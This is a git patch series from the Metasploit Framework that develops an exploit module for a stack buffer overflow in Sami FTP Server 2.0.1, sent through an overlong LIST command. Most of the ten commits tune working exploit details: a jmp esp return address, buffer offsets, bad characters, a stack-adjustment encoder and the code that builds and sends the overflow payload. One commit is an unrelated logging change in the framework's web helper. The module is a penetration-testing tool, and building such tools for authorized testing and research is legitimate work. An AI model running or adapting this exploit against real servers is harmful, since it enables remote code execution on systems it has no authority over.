From e9af05a178de461cb42728d2b84169d143aa149c Mon Sep 17 00:00:00 2001 From: Doug P Date: Fri, 15 Mar 2013 11:35:12 -0400 Subject: [PATCH 01/10] made recommended changes --- .../exploits/windows/ftp/sami_ftpd_list.rb | 24 +++++++------------ 1 file changed, 8 insertions(+), 16 deletions(-) diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index 5e407e2c9a..42e246062d 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit4 < Msf::Exploit::Remote - Rank = AverageRanking + Rank = NormalRanking include Msf::Exploit::Remote::Ftp @@ -31,43 +31,35 @@ class Metasploit4 < Msf::Exploit::Remote [ 'OSVDB', '90815'], [ 'EDB', '24557'], ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'seh', - 'target' => 0 - }, 'Privileged' => false, 'Payload' => { - 'Space' => 900, - 'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09", + 'Space' => 955, + 'BadChars' => "\x00\x0a\x0d\x20\xff", 'StackAdjustment' => -3500, }, 'Targets' => [ [ - 'Windows XP English SP3', + 'Windows Universal', { 'Platform' => 'win', - 'Ret' => 0x10028283, + 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll 'Offset' => 219, }, ], ], + 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 27 2013')) end def exploit - connect + connect_login - print_status("Trying target #{target.name}...") - - buf = rand_text_english(target['Offset'], payload_badchars) + buf = rand_text(target['Offset'], payload_badchars) buf << [ target['Ret'] ].pack('V') buf << payload.encoded - send_cmd( ['USER', datastore['FTPUSER']] , false ) - send_cmd( ['PASS', datastore['FTPPASS']], false ) send_cmd( ['LIST', buf], false ) handler From 8f4b3d073a9b44f7813844ef6580e5f17987cb17 Mon Sep 17 00:00:00 2001 From: Doug P Date: Fri, 15 Mar 2013 14:52:39 -0400 Subject: [PATCH 02/10] Explicitly set EXITFUNC to thread --- modules/exploits/windows/ftp/sami_ftpd_list.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index 42e246062d..16c2c48fbd 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -32,6 +32,10 @@ class Metasploit4 < Msf::Exploit::Remote [ 'EDB', '24557'], ], 'Privileged' => false, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, 'Payload' => { 'Space' => 955, From 8b5c782b549a184a2934100d6ac61abf61b0facd Mon Sep 17 00:00:00 2001 From: Doug P Date: Fri, 15 Mar 2013 15:13:52 -0400 Subject: [PATCH 03/10] changed Platform from Windows to win --- modules/exploits/windows/ftp/sami_ftpd_list.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index 16c2c48fbd..94fc2cb6f4 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -19,7 +19,7 @@ class Metasploit4 < Msf::Exploit::Remote A buffer overflow is triggered when a long LIST command is sent to the server and the user views the Log tab. }, - 'Platform' => 'Windows', + 'Platform' => 'win', 'Author' => [ 'superkojiman', # Original exploit @@ -34,7 +34,7 @@ class Metasploit4 < Msf::Exploit::Remote 'Privileged' => false, 'DefaultOptions' => { - 'EXITFUNC' => 'thread', + 'EXITFUNC' => 'thread', }, 'Payload' => { @@ -47,7 +47,6 @@ class Metasploit4 < Msf::Exploit::Remote [ 'Windows Universal', { - 'Platform' => 'win', 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll 'Offset' => 219, }, From a96283029e7491fd3c5f347029526192c4ee4ae2 Mon Sep 17 00:00:00 2001 From: Doug P Date: Fri, 15 Mar 2013 16:08:43 -0400 Subject: [PATCH 04/10] made payload size a little smaller --- modules/exploits/windows/ftp/sami_ftpd_list.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index 94fc2cb6f4..056e773795 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -38,7 +38,7 @@ class Metasploit4 < Msf::Exploit::Remote }, 'Payload' => { - 'Space' => 955, + 'Space' => 900, 'BadChars' => "\x00\x0a\x0d\x20\xff", 'StackAdjustment' => -3500, }, From 3d92d6e9778e66ce159acf9678aae98dc83dff14 Mon Sep 17 00:00:00 2001 From: Doug P Date: Fri, 15 Mar 2013 16:48:53 -0400 Subject: [PATCH 05/10] removed the handler call --- modules/exploits/windows/ftp/sami_ftpd_list.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index 056e773795..5f501c96e2 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -64,9 +64,6 @@ class Metasploit4 < Msf::Exploit::Remote buf << payload.encoded send_cmd( ['LIST', buf], false ) - - handler disconnect end - end From fb90a1b497204a8ff1bd29b185ac7ff738654f09 Mon Sep 17 00:00:00 2001 From: dougsko Date: Mon, 18 Mar 2013 16:18:04 -0300 Subject: [PATCH 06/10] Uses IP address length in offset calculation --- modules/exploits/windows/ftp/sami_ftpd_list.rb | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index 5f501c96e2..52b8d9f12f 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote 'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow', 'Description' => %q{ A buffer overflow is triggered when a long LIST - command is sent to the server and the user views the Log tab. + command is sent to the server while the user is viewing the Logs tab. }, 'Platform' => 'win', 'Author' => @@ -48,18 +48,24 @@ class Metasploit4 < Msf::Exploit::Remote 'Windows Universal', { 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll - 'Offset' => 219, + 'Offset' => 225, }, ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 27 2013')) + register_options( + [ + OptString.new('IPADDR', [true, 'Attacker\'s IP address']) + ], self.class) end def exploit connect_login - - buf = rand_text(target['Offset'], payload_badchars) + sleep 1 + + ip_length = datastore['IPADDR'].length - 3 + buf = rand_text_alphanumeric(target['Offset'] - ip_length) buf << [ target['Ret'] ].pack('V') buf << payload.encoded From ad39a5cdc39036cc90e66109b55dcb81fb1c3dca Mon Sep 17 00:00:00 2001 From: Tasos Laskos Date: Tue, 19 Mar 2013 17:18:44 +0200 Subject: [PATCH 07/10] Auxiliary::Web::HTTP#_request: elog => print_error [SEERM #7815] Switched form elog to print_error to make reporting bugs easier on users. --- lib/msf/core/auxiliary/web/http.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 789c8233c8..0c5eca0ca9 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -252,11 +252,6 @@ class Auxiliary::Web::HTTP private - def print_error( message ) - return if !@parent - @parent.print_error message - end - def call_after_run_blocks while block = @after_run_blocks.pop block.call @@ -318,10 +313,15 @@ class Auxiliary::Web::HTTP # This is bad but we can't anticipate the gazilion different types of network # i/o errors between Rex and Errno. rescue => e - elog e.to_s - e.backtrace.each { |l| elog l } + print_error e.to_s + e.backtrace.each { |l| print_error l } Response.empty end + def print_error( message ) + return if !@parent + @parent.print_error message + end + end end From e2a9245b086778963a8be7b0ee36a87e8e74de25 Mon Sep 17 00:00:00 2001 From: dougsko Date: Tue, 19 Mar 2013 13:20:23 -0300 Subject: [PATCH 08/10] Changed target to Windows XP --- modules/exploits/windows/ftp/sami_ftpd_list.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index 52b8d9f12f..490fa56202 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -45,7 +45,7 @@ class Metasploit4 < Msf::Exploit::Remote 'Targets' => [ [ - 'Windows Universal', + 'Windows XP', { 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll 'Offset' => 225, From b19c51aa818e6ae9b3db6885281b763f52e0c53f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 19 Mar 2013 19:04:14 +0100 Subject: [PATCH 09/10] cleanup for sami_ftpd_list --- .../exploits/windows/ftp/sami_ftpd_list.rb | 52 ++++++++++--------- 1 file changed, 28 insertions(+), 24 deletions(-) diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index 490fa56202..a72fdc22d8 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -8,16 +8,21 @@ require 'msf/core' class Metasploit4 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, - 'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow', + 'Name' => 'Sami FTP Server LIST Command Buffer Overflow', 'Description' => %q{ - A buffer overflow is triggered when a long LIST - command is sent to the server while the user is viewing the Logs tab. + This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1. + The vulnerability exists in the processing of LIST commands. In order to trigger + the vulnerability, the "Log" tab must be viewed in the Sami FTP Server managing + application, in the target machine. On the other hand, the source IP address used + to connect with the FTP Server is needed. If the user can't provide it, the module + will try to resolve it. This module has been tested successfully on Sami FTP Server + 2.0.1 over Windows XP SP3. }, 'Platform' => 'win', 'Author' => @@ -29,47 +34,46 @@ class Metasploit4 < Msf::Exploit::Remote 'References' => [ [ 'OSVDB', '90815'], - [ 'EDB', '24557'], + [ 'EDB', '24557'] ], 'Privileged' => false, - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, 'Payload' => { - 'Space' => 900, - 'BadChars' => "\x00\x0a\x0d\x20\xff", - 'StackAdjustment' => -3500, + 'Space' => 1500, + 'DisableNops' => true, + 'BadChars' => "\x00\x0a\x0d\x20\x5c", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'Targets' => [ - [ - 'Windows XP', + [ 'Sami FTP Server 2.0.1 / Windows XP SP3', { - 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll - 'Offset' => 225, - }, + 'Ret' => 0x10028283, # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll + 'Offset' => 228 + } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 27 2013')) register_options( [ - OptString.new('IPADDR', [true, 'Attacker\'s IP address']) + OptAddress.new('SOURCEIP', [false, 'The local client address']) ], self.class) end def exploit - connect_login - sleep 1 - - ip_length = datastore['IPADDR'].length - 3 - buf = rand_text_alphanumeric(target['Offset'] - ip_length) + connect + if datastore['SOURCEIP'] + ip_length = datastore['SOURCEIP'].length + else + ip_length = Rex::Socket.source_address(rhost).length + end + buf = rand_text(target['Offset'] - ip_length) buf << [ target['Ret'] ].pack('V') + buf << rand_text(16) buf << payload.encoded - send_cmd( ['LIST', buf], false ) disconnect end + end From 26dec4eb8f84bb7cbbdb40c39c5a6ce5cffa0ade Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 19 Mar 2013 21:32:05 +0100 Subject: [PATCH 10/10] last cleanup for sami_ftpd_list --- modules/exploits/windows/ftp/sami_ftpd_list.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/ftp/sami_ftpd_list.rb b/modules/exploits/windows/ftp/sami_ftpd_list.rb index a72fdc22d8..62a7abddc2 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_list.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit4 < Msf::Exploit::Remote - Rank = AverageRanking + Rank = LowRanking include Msf::Exploit::Remote::Ftp @@ -34,6 +34,7 @@ class Metasploit4 < Msf::Exploit::Remote 'References' => [ [ 'OSVDB', '90815'], + [ 'BID', '58247'], [ 'EDB', '24557'] ], 'Privileged' => false,